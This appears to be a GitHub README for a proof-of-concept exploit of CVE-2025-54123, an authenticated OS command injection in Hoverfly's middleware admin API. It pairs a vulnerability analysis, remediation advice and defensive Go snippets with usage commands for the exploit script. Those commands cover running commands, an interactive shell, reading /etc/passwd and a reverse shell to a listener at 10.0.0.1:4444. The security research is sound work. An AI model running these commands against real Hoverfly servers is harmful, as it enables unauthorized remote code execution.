0x00phantom-hat/Hoverfly-1.11.3-RCE-CVE-2025-54123-Exploit
# CVE-2025-54123 — Hoverfly Middleware API Remote Code Execution
## Vulnerability Overview
| Property | Value |
|-----------------|-----------------------------------------------------------------------|
| **CVE ID** | [CVE-2025-54123](https://nvd.nist.gov/vuln/detail/CVE-2025-54123) |
| **CVSS Score** | **9.8 — Critical** |
| **CVSS Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **CWE** | CWE-78 (OS Command Injection), CWE-20 (Improper Input Validation) |
| **Product** | [Hoverfly](https://github.com/SpectoLabs/hoverfly) — Open-source API simulation tool |
| **Affected** | All versions up to and including **1.11.3** |
| **Fixed In** | **1.12.0** ([patch commit](https://github.com/SpectoLabs/hoverfly/commit/17e60a9bc78826deb4b782dca1c1abd3dbe60d40)) |
| **Advisory** | [GHSA-r4h8-hfp2-ggmf](https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf) |
## Technical Analysis
A case-study deep dive and technical analysis, from both a white-box and a black-box perspective, is available here:
https://medium.com/@phantom_hat/cve-2025-54123-hoverfly-1-11-3-command-injection-rce-case-study-patch-diffing-aacc092f7f3a
### Attack Surface
Hoverfly exposes a RESTful admin API (default port `8888`) for managing simulation configurations. The middleware management endpoint at **`/api/v2/hoverfly/middleware`** accepts a JSON body with `binary` and `script` fields that define an external middleware process.
### Root Cause
The vulnerability arises from a combination of **three code-level flaws**:
1. **Insufficient Input Validation** — [`middleware.go:93-96`](https://github.com/SpectoLabs/hoverfly/blob/master/core/middleware/middleware.go#L93): The `SetBinary()` function accepts the `binary` parameter without any validation or sanitisation, allowing an attacker to specify arbitrary executables (e.g., `bash`).
2. **Unsafe Command Execution** — [`local_middleware.go:14-19`](https://github.com/SpectoLabs/hoverfly/blob/master/core/middleware/local_middleware.go#L13): The middleware is executed via `exec.Command()` with the attacker-controlled `binary` and `script` values passed directly as arguments, enabling OS command injection.
3. **Immediate Execution During Testing** — [`hoverfly_service.go:173`](https://github.com/SpectoLabs/hoverfly/blob/master/core/hoverfly_service.go#L173): When the middleware is set via the API, Hoverfly immediately tests the middleware by executing it, triggering the injected command at configuration time rather than at proxy-intercept time.
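The hardened handling of the `binary` field, as an added illustration rather than Hoverfly's own code or its actual patch (the real fix disables the endpoint by default): `Policy`, `MiddlewareConfig` and the two error values are hypothetical names, and the allowlist is assumed to be fixed by the operator at process start.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
)

// MiddlewareConfig stands in for the `binary` field of the /api/v2/hoverfly/middleware body.
type MiddlewareConfig struct {
	Binary string `json:"binary"`
}

// Policy is operator configuration fixed at process start: the endpoint stays
// off unless explicitly enabled, and only pre-approved interpreters may run.
type Policy struct {
	SetMiddlewareEnabled bool
	AllowedBinaries      map[string]bool // cleaned absolute paths only
}

var (
	ErrAPIDisabled      = errors.New("set-middleware API is disabled")
	ErrBinaryNotAllowed = errors.New("binary is not on the operator allowlist")
)

// SetBinaryChecked hardens an unchecked SetBinary: it refuses while the feature is off,
// rejects relative names (exec.Command would resolve them via PATH) and requires an allowlisted path.
func (p Policy) SetBinaryChecked(cfg *MiddlewareConfig, binary string) error {
	if !p.SetMiddlewareEnabled {
		return ErrAPIDisabled
	}
	if !filepath.IsAbs(binary) {
		return fmt.Errorf("%w: %q is not an absolute path", ErrBinaryNotAllowed, binary)
	}
	clean := filepath.Clean(binary) // collapses "/usr/bin/../bin/node" before the lookup
	if !p.AllowedBinaries[clean] {
		return fmt.Errorf("%w: %q", ErrBinaryNotAllowed, clean)
	}
	cfg.Binary = clean
	return nil
}

func main() {
	p := Policy{SetMiddlewareEnabled: true, AllowedBinaries: map[string]bool{"/usr/bin/node": true}}
	var cfg MiddlewareConfig
	for _, b := range []string{"bash", "/bin/bash", "/usr/bin/../bin/node"} {
		fmt.Printf("%-22s -> %v\n", b, p.SetBinaryChecked(&cfg, b))
	}
}
```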
### Attack Flow
```
Attacker                                   Hoverfly (≤ 1.11.3)
   │                                                │
   │─── POST /api/token-auth ──────────────────────>│ (1) Authenticate
   │<── { "token": "eyJ..." } ──────────────────────│
   │                                                │
   │─── PUT /api/v2/hoverfly/middleware ───────────>│ (2) Inject payload
   │    { "binary": "bash",                         │
   │      "script": "" }                            │
   │                                                │
   │            ┌──────────────────────────────────┐│
   │            │ exec.Command("bash", tmpScript)  ││ (3) Immediate execution
   │            │ → attacker command runs as       ││
   │            │   the Hoverfly process user      ││
   │            └──────────────────────────────────┘│
   │                                                │
   │<── Command output in error response ───────────│ (4) Exfiltrate output
   │                                                │
```
## Exploit Usage
### Prerequisites
- Python 3.8+
- Valid credentials for the Hoverfly admin API (default: `admin` / configurable password)
### Installation
```bash
git clone https://github.com//CVE-2025-54123.git
cd CVE-2025-54123
pip install -r requirements.txt
```
### Modes of Operation
#### Check-Only Mode
Verify target reachability and authentication without exploitation:
```bash
python3 exploit.py -u http://target:8888 -U admin -P -C
```
#### Single Command Execution
Execute a single OS command on the target:
```bash
python3 exploit.py -u http://target:8888 -U admin -P -c 'id'
```
#### Interactive Pseudo-Shell
Drop into a persistent shell session:
```bash
python3 exploit.py -u http://target:8888 -U admin -P -i
```
#### Reverse Shell
Send a reverse shell to your listener:
```bash
# Terminal 1 — start listener
nc -lvnp 4444
# Terminal 2 — launch exploit
python3 exploit.py -u http://target:8888 -U admin -P --revshell 10.0.0.1:4444
```
#### Verbose Mode with Proxy
Route traffic through Burp Suite for inspection:
```bash
python3 exploit.py -u http://target:8888 -U admin -P -c 'cat /etc/passwd' --proxy -v
```
### Full Flag Reference
| Flag | Description | Default |
|---------------------|------------------------------------------|-----------|
| `-u`, `--url` | Target Hoverfly URL | Required |
| `-U`, `--username` | Admin username | Required |
| `-P`, `--password` | Admin password | Required |
| `-c`, `--command` | OS command to execute | — |
| `-C`, `--check` | Check-only mode (no exploitation) | `false` |
| `-i`, `--interactive` | Interactive pseudo-shell | `false` |
| `--revshell` | Reverse shell `LHOST:LPORT` | — |
| `--proxy` | Route through `127.0.0.1:8080` | `false` |
| `--timeout` | Request timeout (seconds) | `15` |
| `-v`, `--verbose` | Enable verbose output | `false` |
## Remediation
| Action | Details |
|--------|---------|
| **Upgrade** | Update Hoverfly to **v1.12.0** or later, where the set middleware API is disabled by default |
| **Network Segmentation** | Restrict access to the Hoverfly admin API (port `8888`) to trusted networks only |
| **Authentication** | Use strong, unique passwords for the Hoverfly admin API |
| **Monitoring** | Monitor for unexpected `PUT` requests to `/api/v2/hoverfly/middleware` |
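A small detector for the Monitoring row above, added here as an example rather than anything shipped with this repository. It assumes a reverse proxy in front of the admin API that logs each request as one JSON line with `src`, `method`, `path` and the parsed `body` (field names are assumptions), and the log lines in `SampleLog` are constructed.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// AuditEvent is one JSON line as logged by a reverse proxy in front of the
// Hoverfly admin API; the field names are assumptions for this example.
type AuditEvent struct {
	Src    string `json:"src"`
	Method string `json:"method"`
	Path   string `json:"path"`
	Body   struct{ Binary string `json:"binary"` } `json:"body"`
}
type Alert struct{ Src, Severity, Reason string } // one detector verdict
// A middleware whose binary is a shell amounts to arbitrary command execution.
var shells = map[string]bool{"bash": true, "sh": true, "dash": true, "zsh": true}

// Detect flags every write to the middleware endpoint and escalates when the binary is a shell.
func Detect(logs string) []Alert {
	var out []Alert
	for _, line := range strings.Split(strings.TrimSpace(logs), "\n") {
		var ev AuditEvent
		if err := json.Unmarshal([]byte(line), &ev); err != nil {
			continue // malformed line: skip it rather than crash the detector
		}
		if ev.Path != "/api/v2/hoverfly/middleware" || (ev.Method != "PUT" && ev.Method != "POST") {
			continue
		}
		sev, why := "high", "middleware definition changed via admin API"
		if shells[ev.Body.Binary[strings.LastIndex(ev.Body.Binary, "/")+1:]] {
			sev, why = "critical", "middleware binary is a shell: "+ev.Body.Binary
		}
		out = append(out, Alert{ev.Src, sev, why})
	}
	return out
}

// SampleLog is constructed for this example, not a real capture.
const SampleLog = `
{"src":"10.0.0.5","method":"GET","path":"/api/v2/hoverfly/middleware"}
{"src":"10.0.0.5","method":"PUT","path":"/api/v2/hoverfly/middleware","body":{"binary":"/usr/bin/node"}}
{"src":"203.0.113.9","method":"PUT","path":"/api/v2/hoverfly/middleware","body":{"binary":"bash"}}
`

func main() {
	fmt.Println(Detect(SampleLog)) // prints one alert per write to the endpoint
}
```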
### Patch Details
The fix in [commit `17e60a9`](https://github.com/SpectoLabs/hoverfly/commit/17e60a9bc78826deb4b782dca1c1abd3dbe60d40) disables the set middleware API by default. Subsequent changes to documentation ([commit `a9d4da7`](https://github.com/SpectoLabs/hoverfly/commit/a9d4da7bd7269651f54542ab790d0c613d568d3e)) make users aware of the security implications of exposing this endpoint.
## References
- [NVD — CVE-2025-54123](https://nvd.nist.gov/vuln/detail/CVE-2025-54123)
- [GitHub Security Advisory — GHSA-r4h8-hfp2-ggmf](https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf)
- [Vulnerable Code — hoverfly_service.go#L173](https://github.com/SpectoLabs/hoverfly/blob/master/core/hoverfly_service.go#L173)
- [Vulnerable Code — middleware.go#L93](https://github.com/SpectoLabs/hoverfly/blob/master/core/middleware/middleware.go#L93)
- [Vulnerable Code — local_middleware.go#L13](https://github.com/SpectoLabs/hoverfly/blob/master/core/middleware/local_middleware.go#L13)
- [Patch Commit — 17e60a9](https://github.com/SpectoLabs/hoverfly/commit/17e60a9bc78826deb4b782dca1c1abd3dbe60d40)
## Disclaimer
## Project Structure
```
CVE-2025-54123/
├── Exploit/
│   ├── exploit.py          # Polished exploit
│   └── raw_exploit.py      # Original raw PoC
├── Images/                 # Research screenshots
├── Reference/              # Reference exploits for study
├── requirements.txt        # Python dependencies
└── README.md               # This file
```
## Author
**Phantom Hat** — Security Researcher
*This research was conducted as part of a vulnerability case study for educational purposes.*